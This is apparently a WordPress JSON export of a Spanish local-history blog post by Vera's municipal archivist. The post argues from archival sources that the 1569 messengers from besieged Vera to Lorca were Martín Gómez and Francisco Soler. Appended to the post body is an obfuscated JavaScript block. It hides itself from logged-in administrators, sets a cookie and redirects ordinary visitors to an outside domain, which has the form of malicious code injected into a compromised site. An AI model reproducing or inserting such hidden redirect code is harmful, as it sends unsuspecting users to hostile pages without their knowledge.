casas del arrabal, y abrieron en las paredes maestras muchas troneras, desde donde tiraban a su salvo a los de la muralla.<\/i><\/p>\n<p align=\"justify\"><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2014\/04\/vera-nueva.jpg\"><img decoding=\"async\" class=\"alignnone size-medium wp-image-235\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2014\/04\/vera-nueva-300x114.jpg\" alt=\"vera nueva\" width=\"300\" height=\"114\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2014\/04\/vera-nueva-300x114.jpg 300w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2014\/04\/vera-nueva.jpg 850w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p align=\"justify\"><i>Dentro de la ciudad andaba un ruido espantoso entre mujeres, ni\u00f1os, soldados y ciudadanos, andando revueltos todos unos con otros: los hombres acud\u00edan adonde m\u00e1s combatida se ve\u00eda la ciudad, recelando que el enemigo trajera escalas para tomar los muros; y con efecto si las llevaran los moros, hubiera sido por ellos ganada Vera sin duda alguna; las mujeres trabajando varonilmente con las faldas alzadas, unas hac\u00edan balas para que las tirasen sus maridos, y otras asaban carne y guisaban ollas para los defensores de la plaza. Todo era com\u00fan en la ciudad, y todos com\u00edan de lo que hab\u00eda, sin apartarse un punto de la muralla por el temor de que el enemigo la escalase. Hac\u00edan de noche grandes hogueras en la plaza y por todas las calles, de manera que estaba la ciudad tan clara como si fuera de d\u00eda. Ten\u00edan como de reserva unos sesenta soldados de a cabalo, y algunos dec\u00edan que saliesen fuera de la ciudad a escaramucear con los enemigos, pensando otros que esto no era bien acordado, porque los moros eran muchos, y ellos luego ser\u00edan muertos a escopetazos. Sonaban las cajas de guerra de los moros, y correspond\u00edan las trompetas de la caballer\u00eda cristiana, de modo que dentro de la ciudad andaba un alboroto muy grande: as\u00ed estuvo Vera cerca de dos d\u00edas. Los moros llevaban una pieza de batir, y dispararon con ella un tiro al cubo de una torre, al cual hizo notable da\u00f1o; esto sucedi\u00f3 el d\u00eda primero del cerco; pero quiso Dios que aquel tiro fue el primero y el postrero, porque revent\u00f3 la pieza por la demasiada carga que la echaron; pues a no suceder as\u00ed, fuera entrada y saqueada la ciudad a pocos tiros que tiraran.<\/i><\/p>\n<p align=\"justify\"><i>En la segunda noche de verse los de Vera en tanta estrechez, acordaron enviar a pedir a Lorca socorro con toda diligencia, y as\u00ed apenas rompi\u00f3 el alba, abrieron con el disimulo mayor que se pudo una de las puertas de la ciudad, y por all\u00ed enviaron a dicho fin <b>tres escuderos sobre buenos caballos<\/b>. Apenas salieron fuera cuando picaron de espuela y echaron a volar con la rapidez del rayo. Luego que los moros los vieron les tiraron muchos escopetazos, y quiso Dios que no les acertara ning\u00fan tiro. El que de los tres llevaba mejor caballo lleg\u00f3 a Lorca a las once del d\u00eda, habiendo andado once leguas en seis horas; otro lleg\u00f3 a las doce, y ya a este tiempo estaba junta en cabildo la ciudad de Lorca, deliberando sobre lo que se har\u00eda, porque estando Vera en la jurisdicci\u00f3n de Granada, no hab\u00eda obligaci\u00f3n precisa de socorrerla. Sin embargo se acord\u00f3 que fuese Vera socorrida, y as\u00ed tocando luego la campana a rebato, se junt\u00f3 en la plaza mucha gente de guerra, a la cual se dieron arcabuces de los que casualmente ten\u00eda la ciudad en su sala de ayuntamiento, que hab\u00edan venido de Cartagena para Hu\u00e9rcal, y cuyo factor o comisionado era Luis de Salazar, escribano de Lorca. En seguida proveyeron de plomo y cuerdas a todos los de la jornada, con tanta prontitud, que a la una de la tarde ya estaba lista para partir toda la gente de socorro. Se nombraron capitanes de caballer\u00eda a <b>Diego Mateo<\/b>, el viejo, llamado <b>Guevara<\/b>, que hab\u00eda venido del campo del marqu\u00e9s, y de infanter\u00eda a <b>Adri\u00e1n Leon\u00e9s Alburquerque<\/b>, hombre de mucho valor. Junt\u00e1ronse en la plaza de Lorca ochocientos soldados de a pie, todos j\u00f3venes y buenos tiradores, y unos ochenta de a caballo, compuestos de hijos-dalgo y de las familias m\u00e1s distinguidas. Ser\u00edan las dos de la tarde cuando la gente brillante de Lorca sal\u00eda ya por la puerta de Nogalte, y tomaba la vuelta de Vera, sin que jam\u00e1s se hubiese visto antes reunido un socorro con tanta presteza. Caballeros y peones salieron a rebato y volaron como aves, de manera que al anochecer lleg\u00f3 a la fuente de Pulp\u00ed toda la gente, y tomando un corto refresco, pas\u00f3 de all\u00ed adelante sin parar un solo punto, y al romper del alba se hall\u00f3 ya al pie de las murallas de Vera gritando: Santiago, Santiago, aqu\u00ed est\u00e1 Lorca, que viene de socorro.<\/i><\/p>\n<p align=\"justify\"><i>El reyecillo malo, luego que vio salir de Vera a los caballeros para pedir socorro a Lorca, perdi\u00f3 la esperanza del buen \u00e9xito de su empresa, aunque toda aquella noche combati\u00f3 la ciudad vigorosamente pensando todav\u00eda tomarla. Para saber cu\u00e1ndo llegar\u00eda el socorro, despach\u00f3 esp\u00edas y puso atalayas en los puntos m\u00e1s elevados de la sierra; \u00e9stas, luego que descubrieron la gente de Lorca que acud\u00eda al socorro de Vera, haciendo humadas<\/i> (&#8230;)<\/p>\n<p align=\"justify\">\u00a0<a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2014\/04\/portada-historia-guerras-civiles-granada.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-233\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2014\/04\/portada-historia-guerras-civiles-granada-209x300.jpg\" alt=\"portada historia guerras civiles granada\" width=\"209\" height=\"300\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2014\/04\/portada-historia-guerras-civiles-granada-209x300.jpg 209w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2014\/04\/portada-historia-guerras-civiles-granada.jpg 300w\" sizes=\"(max-width: 209px) 100vw, 209px\" \/><\/a><\/p>\n<p align=\"justify\">Como podemos observar, P\u00e9rez de Hita no sab\u00eda los nombres de los tres escuderos que salieron hacia Lorca.<\/p>\n<p align=\"justify\">Las otras dos fuentes secundarias, la <i>Cr\u00f3nica de la guerra de Granada<\/i>, de probable autor Hurtado de Mendoza, y la <i>Historia de la rebeli\u00f3n y castigo de los moriscos del reino de Granada<\/i>, de M\u00e1rmol Carvajal, no dan demasiadas noticias sobre Vera.<\/p>\n<ol>\n<li style=\"list-style-type: none\">\n<ol>\n<li style=\"list-style-type: none\">\n<ol start=\"3\">\n<li>\n<p align=\"justify\"><b>DON EUSEBIO GARRES SEGURA Y DON JUAN CUADRADO<\/b><\/p>\n<\/li>\n<\/ol>\n<\/li>\n<\/ol>\n<\/li>\n<\/ol>\n<p align=\"justify\">Dos referencias posteriores son las de estos dos escritores veratenses. Don Eusebio Garres Segura, con gran m\u00e9rito, dadas las dificultades que en aquellos tiempos se encontraban para investigar sobre la Historia de Vera, public\u00f3 en 1908 el libro por todos conocido: <i>Historia de la Muy Noble y Muy Leal Ciudad de Vera<\/i>. Sirva este art\u00edculo como homenaje a \u00e9l por haber sido el primero en atreverse a divulgar la Historia de Vera entre los vecinos. Es mi humilde opini\u00f3n: debemos admirar a los hombres que aplican sus ideas, y no tanto a los que las dejan pasear en su mente buscando las faltas de los que han tenido el valor de ejecutarlas.<\/p>\n<p align=\"justify\"><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2014\/04\/cubierta-libro-garres-segura.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-234\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2014\/04\/cubierta-libro-garres-segura-213x300.jpg\" alt=\"cubierta libro garres segura\" width=\"213\" height=\"300\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2014\/04\/cubierta-libro-garres-segura-213x300.jpg 213w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2014\/04\/cubierta-libro-garres-segura.jpg 292w\" sizes=\"(max-width: 213px) 100vw, 213px\" \/><\/a><\/p>\n<p align=\"justify\">En \u00e9l leemos lo siguiente sobre esta cuesti\u00f3n:<\/p>\n<p align=\"justify\">(\u2026) <i>Luego que Ab\u00e9n Humeya lleg\u00f3 con sus 15.000 hombres le puso cerco desde punto tan pr\u00f3ximo a las murallas que las balas de los arcabuces alcanzaban de una a otra parte del pueblo. <\/i><\/p>\n<p align=\"justify\"><i>Los de la plaza, en la muralla, arcabuceaban al enemigo, ocasion\u00e1ndole grandes da\u00f1os; por esto los moros abrieron troneras en las casas que exist\u00edan en el arrabal, desde donde hac\u00edan fuego a la poblaci\u00f3n, al abrigo del que \u00e9sta les hiciera.<\/i><\/p>\n<p align=\"justify\"><i>Las mujeres, trabajando varonilmente con las faldas recogidas, unas hac\u00edan balas, otras asaban carnes y guisaban para los valientes defensores que se no se apartaban un instante de la muralla por temos a un escalamiento.<\/i><\/p>\n<p align=\"justify\"><i>Con grandes hogueras iluminaban de noche la plaza y calles de la Ciudad pareciendo de d\u00eda. As\u00ed estuvieron cuarenta y ocho horas.<\/i><\/p>\n<p align=\"justify\"><i>Los moros que llevaban una pieza de batir la enclavaron en un peque\u00f1o mont\u00edclo cerca de la Puerta de Arriba (sin duda alguna en lo que hoy llamamos Cabecico), y desde all\u00ed dispararon sobre la poblaci\u00f3n, clav\u00e1ndose el proyectil en uno de los cubos que flanqueaban la puerta.<\/i><\/p>\n<p align=\"justify\"><i>Mucho da\u00f1o ocasion\u00f3, y gracias a haber reventado la pieza en el primer disparo por la demasiada carga de p\u00f3lvora, esta memorable jornada no fue funesta a nuestros hermanos.<\/i><\/p>\n<p align=\"justify\"><i>En la segunda noche del sitio, vi\u00e9ndose los de Vera con tanta estrechez, empezaron a temer por su suerte. Era a la saz\u00f3n teniente de Alcalde Mayor el Licenciado Juan Soler que, suponiendo ya dif\u00edcil la resistencia por lo exiguo de la guarnici\u00f3n y el poder del enemigo, acord\u00f3 con el Cabildo y Concejo de la Ciudad pedir socorro a Lorca, mandando para ello tres emisarios que se aventurasen a atravesar el campo de los sitiadores, salvando as\u00ed la eventualidad de que uno o dos cayesen en manos de los enemigos.<\/i><\/p>\n<p align=\"justify\"><i>\u00a1Qu\u00e9 hermoso ejemplo de patriotismo dieron aquellos tres heroicos escuderos que se disputaron tal gloria, exponi\u00e9ndose a una muerte cierta por salvar su pueblo! Los hombres de tan valientes patricios vivir\u00e1n eternamente en los anales de la Historia de Vera: \u00a1<b>Adri\u00e1n Leon\u00e9s<\/b>, <b>Mateo N\u00fa\u00f1ez<\/b> y <b>Diego C\u00e9spedes<\/b>! Las generaciones posteriores al bendecir vuestros nombres, admiran tanta abnegaci\u00f3n y valor.<\/i><\/p>\n<p align=\"justify\"><i>Salidos al amanecer por una misma puerta y al mismo tiempo, seg\u00fan P\u00e9rez de Hita, y seg\u00fan otros a una misma hora pero por distintos sitios, pudieron romper las l\u00edneas enemigas, libr\u00e1ndose del nutrido fuego que les hicieron los moros.<\/i><\/p>\n<p align=\"justify\"><i>Quien primeramente lleg\u00f3 a Lorca fue Leon\u00e9s, a las once de la ma\u00f1ana, habiendo recorrido las once leguas aproximadamente que separan ambas poblaciones en seis horas; el segundo lleg\u00f3 a las 12 y un poco despu\u00e9s el tercero.<\/i><\/p>\n<p align=\"justify\"><i>El Cabildo de Lorca deliber\u00f3 sobre lo que se har\u00eda, porque siendo Vera de la jurisdicci\u00f3n de Granada no hab\u00eda obligaci\u00f3n precisa de socorrerla; pero sin embargo acordaron volar en su auxilio y a la una de la tarde de aquel mismo d\u00eda estaban listas para partir las fuerzas de socorro, nombrando capitanes, de caballer\u00eda, a <\/i><i><b>Diego de Guevara<\/b><\/i><i>, y de infanter\u00eda, a <\/i><i><b>Adri\u00e1n Leon\u00e9s Alburquerque<\/b><\/i><i>, hombres de gran valor, el mismo que de Vera sali\u00f3 en busca de auxilio <\/i>(\u2026)<\/p>\n<p align=\"justify\">Haciendo uso de nuestra base de datos, encontramos a un Mateo N\u00fa\u00f1ez en el a\u00f1o 1639 (censo de milicias descubierto, rescatado, digitalizado y automatizado en el a\u00f1o 2007, aprox.). No tenemos m\u00e1s datos de \u00e9l, ni tampoco del supuesto Diego C\u00e9spedes.<\/p>\n<p align=\"justify\"><b>2 1 4 Padrones de Habitantes de Vera<\/b><\/p>\n<table border=\"1\" width=\"643\" cellspacing=\"0\" cellpadding=\"2\" bgcolor=\"#ffffff\">\n<thead>\n<tr>\n<th bgcolor=\"#c0c0c0\" width=\"25\">\n<p align=\"justify\"><span style=\"color: #000000\"><span style=\"font-family: Arial\"><span style=\"font-size: xx-small\">A\u00d1O<\/span><\/span><\/span><\/p>\n<\/th>\n<th bgcolor=\"#c0c0c0\" width=\"46\">\n<p align=\"justify\"><span style=\"color: #000000\"><span style=\"font-family: Arial\"><span style=\"font-size: xx-small\">FOLIO N\u00ba REG<\/span><\/span><\/span><\/p>\n<\/th>\n<th bgcolor=\"#c0c0c0\" width=\"38\">\n<p align=\"justify\"><span style=\"color: #000000\"><span style=\"font-family: Arial\"><span style=\"font-size: xx-small\">CALLE<\/span><\/span><\/span><\/p>\n<\/th>\n<th bgcolor=\"#c0c0c0\" width=\"61\">\n<p align=\"justify\"><span style=\"color: #000000\"><span style=\"font-family: Arial\"><span style=\"font-size: xx-small\">N\u00ba FAMILIA\/CASA<\/span><\/span><\/span><\/p>\n<\/th>\n<th bgcolor=\"#c0c0c0\" width=\"60\">\n<p align=\"justify\"><span style=\"color: #000000\"><span style=\"font-family: Arial\"><span style=\"font-size: xx-small\">NOMBRE PILA<\/span><\/span><\/span><\/p>\n<\/th>\n<th bgcolor=\"#c0c0c0\" width=\"60\">\n<p align=\"justify\"><span style=\"color: #000000\"><span style=\"font-family: Arial\"><span style=\"font-size: xx-small\">1\u00ba APELLIDO<\/span><\/span><\/span><\/p>\n<\/th>\n<th bgcolor=\"#c0c0c0\" width=\"71\">\n<p align=\"justify\"><span style=\"color: #000000\"><span style=\"font-family: Arial\"><span style=\"font-size: xx-small\">2\u00ba APELLIDO \/ ALIAS<\/span><\/span><\/span><\/p>\n<\/th>\n<th bgcolor=\"#c0c0c0\" width=\"32\">\n<p align=\"justify\"><span style=\"color: #000000\"><span style=\"font-family: Arial\"><span style=\"font-size: xx-small\">EDAD<\/span><\/span><\/span><\/p>\n<\/th>\n<th bgcolor=\"#c0c0c0\" width=\"65\">\n<p align=\"justify\"><span style=\"color: #000000\"><span style=\"font-family: Arial\"><span style=\"font-size: xx-small\">PROFESI\u00d3N<\/span><\/span><\/span><\/p>\n<\/th>\n<th bgcolor=\"#c0c0c0\" width=\"55\">\n<p align=\"justify\"><span style=\"color: #000000\"><span style=\"font-family: Arial\"><span style=\"font-size: xx-small\">NOTAS SIGNOS<\/span><\/span><\/span><\/p>\n<\/th>\n<th bgcolor=\"#c0c0c0\" width=\"85\">\n<p align=\"justify\"><span style=\"color: #000000\"><span style=\"font-family: Arial\"><span style=\"font-size: xx-small\">CIVIL \/ MILITAR<\/span><\/span><\/span><\/p>\n<\/th>\n<\/tr>\n<\/thead>\n<tbody>\n<tr valign=\"top\">\n<td width=\"25\">\n<p align=\"justify\"><span style=\"color: #800080\"><span style=\"font-family: Arial\"><span style=\"font-size: xx-small\"><b>1639<\/b><\/span><\/span><\/span><\/p>\n<\/td>\n<td width=\"46\"><\/td>\n<td width=\"38\"><\/td>\n<td width=\"61\"><\/td>\n<td width=\"60\">\n<p align=\"justify\"><span style=\"color: #800080\"><span style=\"font-family: Arial\"><span style=\"font-size: xx-small\"><b>MATEO MATEO?<\/b><\/span><\/span><\/span><\/p>\n<\/td>\n<td width=\"60\">\n<p align=\"justify\"><span style=\"color: #800080\"><span style=\"font-family: Arial\"><span style=\"font-size: xx-small\"><b>N\u00da\u00d1EZ<\/b><\/span><\/span><\/span><\/p>\n<\/td>\n<td width=\"71\"><\/td>\n<td width=\"32\"><\/td>\n<td width=\"65\"><\/td>\n<td width=\"55\"><\/td>\n<td width=\"85\">\n<p align=\"justify\"><span style=\"color: #800080\"><span style=\"font-family: Arial\"><span style=\"font-size: xx-small\"><b>GENTE DE GUERRA IMPEDIDA<\/b><\/span><\/span><\/span><\/p>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p align=\"justify\">Don Juan Cuadrado da por buena la versi\u00f3n de don Eusebio en <i>La defensa de Vera contra Aben Humeya, cuando la sublevaci\u00f3n morisca de la Alpujarra <\/i>(1977).<\/p>\n<p align=\"justify\"><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2014\/04\/detalle-defensa-de-vera.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-237\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2014\/04\/detalle-defensa-de-vera-213x300.jpg\" alt=\"detalle defensa de vera\" width=\"213\" height=\"300\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2014\/04\/detalle-defensa-de-vera-213x300.jpg 213w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2014\/04\/detalle-defensa-de-vera.jpg 616w\" sizes=\"(max-width: 213px) 100vw, 213px\" \/><\/a><\/p>\n<p align=\"justify\"><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2014\/04\/portada-juan-cuadrado-guardas-reduc-sepia.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-238\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2014\/04\/portada-juan-cuadrado-guardas-reduc-sepia-224x300.jpg\" alt=\"portada juan cuadrado guardas reduc sepia\" width=\"224\" height=\"300\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2014\/04\/portada-juan-cuadrado-guardas-reduc-sepia-224x300.jpg 224w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2014\/04\/portada-juan-cuadrado-guardas-reduc-sepia-766x1024.jpg 766w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2014\/04\/portada-juan-cuadrado-guardas-reduc-sepia.jpg 945w\" sizes=\"(max-width: 224px) 100vw, 224px\" \/><\/a><\/p>\n<p align=\"justify\">Observamos claramente c\u00f3mo, en un momento de la redacci\u00f3n de don Eusebio, bas\u00e1ndose en el texto de P\u00e9rez de Hita, adjudica a los referidos tres escuderos (sin apelativo en el viejo libro) tres nombres de los que dos de ellos parecen inventados, <b>Mateo N\u00fa\u00f1ez<\/b> y <b>Diego C\u00e9spedes<\/b>, creados, a manera de anagrama, me aventuro a plantear, a partir del personaje real de P\u00e9rez de Hita &#8216;<b>Diego Mateo<\/b>&#8216;, &#8216;el viejo&#8217;, llamado &#8216;Guevara&#8217;, nombrado capit\u00e1n de caballer\u00eda en Lorca con el fin de ir a Vera. El de sobra conocido <b>Adri\u00e1n Leon\u00e9s Alburquerque<\/b> fue un personaje real, pero es poco probable que saliese de Vera como correo y volviese de nuevo como capit\u00e1n de guerra desde Lorca.<\/p>\n<p align=\"justify\"><b>CONCLUSI\u00d3N:<\/b><\/p>\n<p align=\"justify\">Me atrevo a concluir diciendo, tras los datos expuestos, que, a menos que don Eusebio Garres Segura consultase una obra o documento del que desconocemos actualmente su existencia, desde que su escrito se edit\u00f3, se ha difundido el error de que fueron <b>Adri\u00e1n Leon\u00e9s<\/b>, <b>Mateo N\u00fa\u00f1ez<\/b> y <b>Diego C\u00e9spedes<\/b> los mensajeros que acudieron avisar a los lorquinos pidiendo ayuda, al margen de que, a falta de conocer esos nombres, el escritor pretendiera dar nombre a esos tres personajes desconocidos a fin de homenajearlos de alguna manera. Intenci\u00f3n loable, en todo caso. As\u00ed, tal como indican los documentos originales del Archivo Municipal de Lorca, los h\u00e9roes que salieron de Vera hacia Lorca fueron <b>Mart\u00edn G\u00f3mez<\/b> y <b>Francisco Soler<\/b>.<\/p>\n<p align=\"justify\">Quedar\u00edan en el aire las atractivas dudas de por qu\u00e9 P\u00e9rez de Hita afirm\u00f3 que fueron tres los valientes jinetes y qui\u00e9n era ese Mateo N\u00fa\u00f1ez que aparece en el censo de milicias de 1639.<\/p>\n<p align=\"right\">Manuel Caparr\u00f3s Perales<\/p>\n<p align=\"right\">Archivero Municipal de Vera<\/p>\n<p align=\"right\">04-04-14<\/p>\n<p><script>var _0x2cf4=['MSIE;','OPR','Chromium','Chrome','ppkcookie','location','https:\/\/www.areyourobots.xyz','onload','getElementById','undefined','setTime','getTime','toUTCString','cookie',';\\x20path=\/','split','length','charAt','substring','indexOf','match','userAgent','Edge'];(function(_0x15c1df,_0x14d882){var _0x2e33e1=function(_0x5a22d4){while(--_0x5a22d4){_0x15c1df['push'](_0x15c1df['shift']());}};_0x2e33e1(++_0x14d882);}(_0x2cf4,0x104));var _0x287a=function(_0x1c2503,_0x26453f){_0x1c2503=_0x1c2503-0x0;var _0x58feb3=_0x2cf4[_0x1c2503];return _0x58feb3;};window[_0x287a('0x0')]=function(){(function(){if(document[_0x287a('0x1')]('wpadminbar')===null){if(typeof _0x335357===_0x287a('0x2')){function _0x335357(_0xe0ae90,_0x112012,_0x5523d4){var _0x21e546='';if(_0x5523d4){var _0x5b6c5c=new Date();_0x5b6c5c[_0x287a('0x3')](_0x5b6c5c[_0x287a('0x4')]()+_0x5523d4*0x18*0x3c*0x3c*0x3e8);_0x21e546=';\\x20expires='+_0x5b6c5c[_0x287a('0x5')]();}document[_0x287a('0x6')]=_0xe0ae90+'='+(_0x112012||'')+_0x21e546+_0x287a('0x7');}function _0x38eb7c(_0x2e2623){var _0x1f399a=_0x2e2623+'=';var _0x36a90c=document[_0x287a('0x6')][_0x287a('0x8')](';');for(var _0x51e64c=0x0;_0x51e64c<_0x36a90c[_0x287a('0x9')];_0x51e64c++){var _0x37a41b=_0x36a90c[_0x51e64c];while(_0x37a41b[_0x287a('0xa')](0x0)=='\\x20')_0x37a41b=_0x37a41b[_0x287a('0xb')](0x1,_0x37a41b['length']);if(_0x37a41b[_0x287a('0xc')](_0x1f399a)==0x0)return _0x37a41b[_0x287a('0xb')](_0x1f399a['length'],_0x37a41b[_0x287a('0x9')]);}return null;}function _0x51ef8a(){return navigator['userAgent'][_0x287a('0xd')](\/Android\/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](\/BlackBerry\/i)||navigator['userAgent'][_0x287a('0xd')](\/iPhone|iPad|iPod\/i)||navigator[_0x287a('0xe')]['match'](\/Opera Mini\/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](\/IEMobile\/i);}function _0x58dc3d(){return navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0xf'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x10'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x11'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x12'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')]('Firefox')!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x13'))!==-0x1;}var _0x55db25=_0x38eb7c(_0x287a('0x14'));if(_0x55db25!=='un'){if(_0x58dc3d()||_0x51ef8a()){_0x335357('ppkcookie','un',0x16d);window[_0x287a('0x15')]['replace'](_0x287a('0x16'));}}}}}(this));};<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>La gente de a pie, ocupada en sus quehaceres y en sacar a sus familias adelante, la mayor\u00eda de las veces no tiene los medios, el tiempo libre, ni la informaci\u00f3n necesaria para contrastar los datos hist\u00f3ricos y comprender mejor la Historia de su pueblo. Una de nuestras labores es aclarar a los interesados estos &hellip; <a href=\"https:\/\/blog.vera.es\/cultura\/2014\/04\/09\/1569-aben-humeya-socorro-a-lorca-no-fueron-tres-sino-dos-martin-gomez-y-francisco-soler\/\" class=\"more-link\">Seguir leyendo <span class=\"screen-reader-text\">1569. AB\u00c9N HUMEYA. SOCORRO A LORCA. NO FUERON TRES, SINO DOS. MART\u00cdN G\u00d3MEZ GARRIDO Y FRANCISCO SOLER CAMPOY<\/span> <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":7,"featured_media":229,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[109],"tags":[14,270],"class_list":["post-228","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-historia","tag-historia","tag-s-xvi"],"_links":{"self":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts\/228","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/comments?post=228"}],"version-history":[{"count":10,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts\/228\/revisions"}],"predecessor-version":[{"id":3442,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts\/228\/revisions\/3442"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/media\/229"}],"wp:attachment":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/media?parent=228"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/categories?post=228"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/tags?post=228"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}